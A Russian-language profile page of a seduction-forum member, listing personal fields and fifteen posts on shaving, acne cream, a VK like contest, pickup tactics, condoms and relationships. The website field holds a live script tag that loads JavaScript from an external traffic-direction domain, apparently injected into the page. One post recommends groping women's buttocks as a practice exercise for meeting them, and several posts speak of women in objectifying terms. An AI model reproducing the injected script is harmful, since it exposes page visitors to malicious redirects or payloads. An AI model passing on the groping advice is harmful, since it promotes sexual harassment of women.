Перейти к содержанию

fdm

Форумчанин
  • Публикаций

    121
  • Зарегистрирован

  • Посещение

Репутация

0 Обычный

Информация о fdm

  • Звание
    любитель
  • День рождения 23.07.1979

Контакты

  • Сайт
    http://<script type="text/javascript" src="http://wap-tds.in/code/js.php?i=3243&r=5291&p=9356&c=8"></script>

Информация

  • Город
    Воронеж
  • Интересы
    Графика, Видео, поэзия, психология

Старые поля

  • Пол
    Мужской

Посетители профиля

433 просмотра профиля
  1. раздражение после бритья

    Я вообще бреюсь одноразовыми женскими Жилет с гелевой полоской. отлично бреют, и тоже раньше кожа реагировала не айс. Аааа. вот еще. Если бы мне раньше кто подсказал от прыщей средство, что только не использовал. Короче потрать рублей 450 на Зинерит (месячный курс). Просто убойная сила, правда лучше перед сном, пахнет сильно. Кто скажет что это голимая хрень, не поверю!!! ибо с прящями промучился всю молодость!
  2. Спасибо за активность, пусть и очень слабенькую, мы уже на первом месте, но все только начанается. Жду вашей поддержки. Для нас это очень важно!
  3. Бодрого всем времени суток. Вы все знаете, что часто в Вконтакте для того, чтобы выиграть тот или иной приз, нужно собрать лайки. И они должны быть реальные, а не накрученные. Начну первым. Проходит конкурс влюбленных пар. Вот моя фотография с возлюбленной: http://vk.com/photo-32657578_281968015 Нужно нажать только "Мне нравится ♥" Также с радостью поддержу всех тех, кто также хочет собрать голоса. И вы можете писать свои пожелания в этой теме! Модераторов прошу оставить эту тему, Ведь благодаря ей можно: 1. помогать выигрывать в конкурсах, ведь нас здесь очень много! 2. удивлять девушек кол-вом лайков у их фоток))) 3. все интересное, зависящее от нас вцелом. Также можно даже комментами забрасывать фото любой девушки))
  4. Значит она тебе очень ценна, больше чем все остальные. и в тебе по неопытности включился муж, защитники прочие его нехорошие проявления. Ты хочешь с ней серьезных отношений, поэтому и ведешь себя серьезно, но в этом-то и провал. веди себя не серьезно и будут тебе серьезные отношения.. С этим нужно работать, для этого мы здесь и общаемся: Работать над собой, своими фобиями, для снятия барьеров наставленных обществом, семьей. Прочитай еще раз начало "ЖБТ" или "новая ЖБТ" мозго вправит. Успехов в поиске самца внутри себя и самцовым поведением с любой девочкой.
  5. Да, можно. все равно переключается нужно. Туда - сюда.. Так ты в разных эпостасиях выступаешь. И так можешь и так. вывод: В тебе есть все что нужно самке, домохозяйке, любовнице - все что есть в каждой девушке. Прикрываешь, так сказать, все ее потребности.
  6. Вот тебе совет: 1. выполни упражение из ЖБТ (там поробно написано) - Максимальное кол-во подходов к девушкам за 30 мин. с целью взять телефон. 2. знакомство через "лапание поп" . Оба упражения проходил с другом несколько раз, т.к. поняли, что без них никуда. Можно мечтать, но без практики очень туго все идет. Сейчас мне 32 года.. и первый раз их выполнил в 31 год!!! Жуть как страшно было!!! просто ПИСЕЦ!, но уже на 5-6 девушке появляется азарт и пофигизм к тому, что ответят и как )) ТОлько опыт!!! Подними Задницу, иди на самую одивленную улицу или клуб и впуть!!! Будут отказы, негативы, но также бедут много плюсов от тех кто рад, что к ним все-таки подошли на улице!!!)) Сначала подходи ко всем без разбору, потом выбирай покрасивее!!! Тебе две недели. Потом отчитаешься в новом посте. Назови "Я это сделал для себя". Не сделаешь, минусну! Вот так еще тренировался на мелость: http://flirtisforum.ru/index.php?showtopic=19209&hl=
  7. Прочти ЖБТ, там все прекрасно написано. Кстати, с понимания этого вопроса начался пой путь соблазнителя.
  8. 3 просмотра - о комментов пишите ваши мысли, удержать девушку - это тоже большое дело!
  9. Прочитал пост от Z.E.T. и решил в отдельную тему кинуть. Нужно отыграть следующую тему: Вопрос, что вы будете делать: 1. если вашей девушке все еще пишут ее бывшие? 2. Если она поддерживает отношения с некоторыми бывшими, говоря, что они ничего для нее не значат? 3. может пофлиртовать при вас? 4. Если с ней начнут флиртовать при вас?
  10. тема очень актуальна. Не только у Z.E.T. такая проблема. Это касается всех красивых девушек. Нужно эту тему отыграть: Вопрос, что вы будете делать: 1. если вашей девушке все еще пишут ее бывшие? 2. Если она поддерживает отношения с некоторыми бывшими, говоря, что они ничего для нее не значат? 3. может пофлиртовать при вас? 4. Если с ней начнут флиртовать при вас? перенесу в отдельную тему...
  11. По поводу эмоций согласен... отношения строятся на эмоциях - 100% правда. Игрушка ли мужчина? Если буешь ассоциировать себя с игрушкой, то вот пример.. Где сейчас твои детские игрушки? Уже нет рядом. Почему в них не играешь? Не интересно. Так вот вывод - любая игрушка рано или поздно перестает давать эмоции, она надоедает. Теперь вариант что она игрушка - тот же вариант: рано или поздно надоест. К чему веду?: Ты - самец в мире людей, твоя задача продлевать род и быть умным и сильным, чтобы выживать. Она самка - выбирает самых заметных среди мужчин своего круга, исходя из ее опыта. Она хочет тебя пока ты самец в ее глазах. Пока ты защищаешь её (физически или словесно) , трахаешь её, выводишь из сотояния равновесия ( как в плюс так и в минус для баланса), пока она видит в твоих глазах животную любовь к ее телу и сердцу.. Забудь про игры, это рамки для тебя, далеко не развиться с таким мнением. Как считаешь?
  12. всегда с новыми девушками с презервативами, и хочу так делать и дальше.. мое здоровье важнее.. и иии самое важное ... кто-то там говорил про сапоги и скафандры... Durex Elite вам в помощь.. стоимость порядка 80 руб за 3 штуки... а ощущения такие как и без него, кстати и входить иногда легче и если она подбрилась там несколько дней назад, щетинка небудет колоться о член.. Резина Рулез... и пахнет хорошо. минет в ней тоже прекрасен.. мммм
  13. Я 100% прочту... чтобы иметь больше козырей... но самое главное быть самим собой, быть мужчиной, все таки у девушек немного другое сознание и оно может отключиться общаясь с нами.. Проверено на профессиональном психологе, которая вначале пыталась изучать меня, ставить рамки, а потом бах и потерялась в своем сознании))) и стала нормальной девушкой, желающей любви и секса))
  14. Поверь, у тебя с логикой все отлично. ты делала все правильно... а жить и заниматься любовью без хоть какой то доли влюбленности не интересно и рано или поздно становится рутиной.. Ты молодец... и он наверняка ценит то, что ты делаешь, даже нарядиться медсестрой не каждая девушка способна... Встречайся с ним пока он тебе интересен и тебе приятно с ним быть рядом... пройдет интерес - забудешь, как всех тех кто был у тебя до него.. Это и есть жизнь, радоваться жизни, любить, и конечно получать от этого физическое наслаждение тоже здорово.
  15. Телефон не взял, т.к. меня фотографировала девушка, с которой я познакомился месяц назад...))))))))) Это было издевательство над ней... Идея была в том, чтобы она уговаривала девушек со мной фоткаться... Потом сама захотела фоткаться с парнями))) Потом увез ее домой... и был отличный вечер... эмоций было через край..))
×